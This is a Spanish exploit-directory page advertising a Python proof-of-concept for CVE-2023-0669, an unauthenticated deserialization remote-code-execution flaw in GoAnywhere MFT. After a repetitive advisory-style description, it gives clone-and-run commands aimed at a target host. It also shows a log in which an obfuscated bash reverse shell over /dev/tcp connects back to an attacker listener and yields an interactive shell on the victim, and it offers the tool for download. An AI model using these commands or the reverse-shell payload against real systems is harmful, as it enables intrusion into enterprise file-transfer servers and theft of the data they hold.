Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Vulnerabilidades de Deserialización Python RCE PoC(Prueba de Concepto) | Kitploit
Herramientas/GitHubGitHub/avento/cve-2023-0669
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Vulnerabilidades de Deserialización Python RCE PoC(Prueba de Concepto)

Ver Repositorio
83hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-0669 GoAnywhere MFT Deserialización - Blog de Je Yiuwai

CVE-2023-0669

CVE-2023-0669 es una vulnerabilidad de deserialización en GoAnywhere MFT que, debido a la deserialización de un objeto controlado por un atacante arbitrario, existe una vulnerabilidad de inyección de comandos pre-autenticada en License Response Servlet. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código arbitrario en el sistema afectado, lo que lleva a un control total del sistema. Esta vulnerabilidad afecta a versiones anteriores a 7.1.2, sin incluir 7.1.2.

CVE-2023-0669 es una vulnerabilidad de deserialización de GoAnywhere MFT que existe en el License Response Servlet debido a una vulnerabilidad de inyección de comandos pre-autenticada que permite a un atacante ejecutar código arbitrario en el sistema afectado mediante la deserialización de un objeto controlado por el atacante. La vulnerabilidad afecta a versiones anteriores a 7.1.2.

Esta vulnerabilidad puede representar una grave amenaza para la seguridad del software de transferencia de archivos de nivel empresarial GoAnywhere MFT. Los atacantes pueden explotarla para robar datos confidenciales, alterar datos, comprometer sistemas, etc. Por lo tanto, los usuarios deben tomar medidas de manera oportuna para proteger la seguridad del sistema.

La vulnerabilidad representa una grave amenaza para la seguridad del software de transferencia de archivos de nivel empresarial GoAnywhere MFT, ya que los atacantes pueden explotarla para robar datos confidenciales, alterar datos y comprometer sistemas. Por lo tanto, los usuarios deben tomar medidas de manera oportuna para proteger sus sistemas.

El aviso de seguridad oficial ha sido publicado y se han proporcionado métodos de inspección preliminares. Los usuarios pueden verificar si sus sistemas están afectados por esta vulnerabilidad buscando cadenas específicas en el registro userdata/logs. Si no se pueden aplicar parches, se recomienda tomar otras medidas de seguridad para proteger el sistema.

El aviso de seguridad oficial ha sido publicado y se han proporcionado métodos de inspección preliminares. Los usuarios pueden verificar si sus sistemas están afectados por la vulnerabilidad buscando cadenas específicas en el registro userdata/logs. Si no se pueden aplicar parches, se recomienda tomar otras medidas de seguridad para proteger el sistema.

En resumen, CVE-2023-0669 es una vulnerabilidad de deserialización que requiere la atención de los usuarios. Los usuarios deben actualizar a la última versión de manera oportuna y verificar si sus sistemas están afectados por esta vulnerabilidad. Además, se recomienda que los usuarios fortalezcan la gestión de seguridad del software de nivel empresarial como GoAnywhere MFT y tomen medidas de seguridad en múltiples niveles para proteger sus sistemas.

En resumen, CVE-2023-0669 es una vulnerabilidad de deserialización que requiere la atención de los usuarios. Los usuarios deben actualizar a la última versión de manera oportuna y verificar si sus sistemas están afectados por la vulnerabilidad. Además, se recomienda que los usuarios refuercen la gestión de seguridad del software de nivel empresarial como GoAnywhere MFT y tomen medidas de seguridad en múltiples capas para proteger sus sistemas.

CVE-2023-0669 PoC

Introducción

Este Exploit es un script basado en Python utilizado para explotar la vulnerabilidad CVE-2023-0669 en GoAnywhere MFT v6.7.9594 y versiones anteriores.

This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.

Descripción de la vulnerabilidad

Esta vulnerabilidad existe debido a un problema de seguridad en el procesamiento de solicitudes Bundle cifradas en GoAnywhere MFT. Un atacante puede enviar una solicitud especialmente diseñada para ejecutar código arbitrario en el servidor objetivo.

This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.

Uso

  1. Clone este repositorio.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Entre en el directorio.
root@kitploit:~
cd CVE-2023-0669
  1. Instale las dependencias requests y cryptography.
root@kitploit:~
pip install requests cryptography
  1. Ejecute el Exploit.
root@kitploit:~
python CVE-2023-0669.py --host <IP del servidor objetivo>
  1. Clone this repository.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Enter the directory.
root@kitploit:~
cd CVE-2023-0669
  1. Install the dependencies of requests and cryptography.
root@kitploit:~
pip install requests cryptography
  1. Run the Exploit.
root@kitploit:~
python CVE-2023-0669.py --host <target IP>

Notas

La ejecución de este Exploit requiere derechos de acceso legales y no debe utilizarse con fines ilegales. Dado que la ejecución de este Exploit representa un riesgo para el servidor objetivo, el usuario es el único responsable de sus riesgos y consecuencias.

Running this Exploit requires legal access rights and should not be used for illegal purposes. As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Autor: Je Yiuwai editado por xiaomi pad 6 pro

Descargar herramienta